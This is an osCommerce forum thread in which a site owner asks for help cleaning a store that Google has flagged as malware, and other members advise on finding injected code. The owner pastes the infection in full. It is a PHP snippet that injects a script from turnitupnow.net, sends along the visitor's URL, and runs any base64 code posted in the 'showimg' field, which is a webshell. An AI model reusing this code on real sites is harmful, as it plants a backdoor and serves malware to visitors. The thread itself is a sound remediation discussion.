Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Malware Website


labmais

Recommended Posts

Posted

Hello,

 

my website has been classified as malware website since one or two weeks ago.

 

http://estereomicroscopio.com.br/

 

I tried to clean it in many ways.

 

 

Anyone know what can be did to solve it?

 

 

 

ANOTHER QUESTION

 

When I go in some categorie, I get a link like this: http://estereomicroscopio.com.br/catalogo/banho-maria-c-64.html

 

 

The question is: how is this link generated? I checked my files but there aren't such .html file.

Is it stored anywhere?

E-commerce?

No external links please.

Posted

You have some sort of "SEO" add-on/mod installed, that generates URLs that look like that. There are no ".html" files in osC, so stop looking for them. Everything is generated by PHP, with a fake name of .html for SEO purposes (hides the underlying technology).

 

As far as cleaning up your site from the malware infection, it's obvious that you're missing something, as you don't understand anything about how your site works. Look around for posts explaining the ways that sites can be secured, and how to clean them up once infected. I seem to recall that "germ" and "Dunweb" have posted on this subject many times, so you might start by searching for their postings.

Posted

Rafael,

 

You have to check ALL of the files in your osCommerce installation and remove ALL malicious code and anomalous files.

 

As Phil stated, there are NO HTML files in osCommerce.

 

 

Chris

Posted

I see Chris and I'm grateful for your help.

 

I received a report from Google.

 

GOOGLE REPORT

 

 

[/left]

Last checked:

November 3, 2011[/left]

 

Suspected injected code Instances

<script src=http://infocenc.com.br/js/>

[/left]

 

 

 

It says that there is a malicious code on it right?? How can I fix this specific reported URL?

 

 

About checking all files...There is no problem to do that, but how can I do that?

If I check all the files, what I need to look for?

E-commerce?

No external links please.

Posted

Rafael,

 

Check all of your files for this:

 

<script src=http://infocenc.com.br/js/>

 

OR, a base64 script line.

 

Once your site has been cleaned and secured, you can then contact Google to remove your site from the blacklist.

 

 

 

Chris

Posted

Two things:

 

1st- I have already checked all files and all DB tables for the mentioned script.

Found only one result and it was inside the DB.

More specifically in the configuration table.

 

2nd- I have really saw a base64 script but it seemed to be ok and I didn't touched it.

So the base64 is bad code?

 

The report mentioned this url too as damaging inside my website:

 

drcutrapalis.orge.pl

 

 

 

base64 code

<?php			global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

#/*
header("Location:catalogo/");
#*/
function decode_pwd($pwd) {
 $pwd = preg_replace("/TmE=|Q2w=/","",base64_decode($pwd));
 return base64_decode($pwd);
}
$config = file("config.txt");
foreach($config as $key => $value) {
 $config[$key] = trim($value);
}
$title	   = $config[0];
$keywords	= $config[1];
$description = $config[2];
$catalog	 = $config[3];
$addr		= $config[4];
$server_addr = $config[5];
$server_user = $config[6];
$server_pass = decode_pwd($config[7]);
$server_db   = $config[8];
?>

E-commerce?

No external links please.

Posted

If it's not in the base osC code, then yes, it's bad. I don't have the code available to compare against right now, but the code you listed above certainly doesn't look like it belongs in osC.

 

After removing it, you've only begun the battle. You have to figure out how the hacker might have gotten in and planted that code, and then seal up all the holes in your site. Germ and DunWeb have posted a lot on that section, so go looking there.

Posted

Ok I will.

 

Only one last question.

 

All base64 code should be deleted??

 

I will do another search on my files.

 

I guess that the "hacker" could get in by "opened door" in the upload image system.

E-commerce?

No external links please.

Posted

Rafael,

 

Not necessarily, there are some instances (especially with payment modules) that the base64 function is used to hide information for security reasons.

 

 

 

Chris

Posted

Ok, I get it, i have to be careful...

 

What about this specifically code that I showed? Is it bad or good code?

 

 

Thanks

E-commerce?

No external links please.

Posted

Rafael,

 

No, that code is not good.

 

 

 

 

Chris

Posted

Once you have cleaned out your site then have a quick look at this page

http://www.oscommerce.com/forums/topic/375288-updated-security-thread/

 

There are a number of recommendations in there that will help you not to get reinfected again.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

  • 1 month later...

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...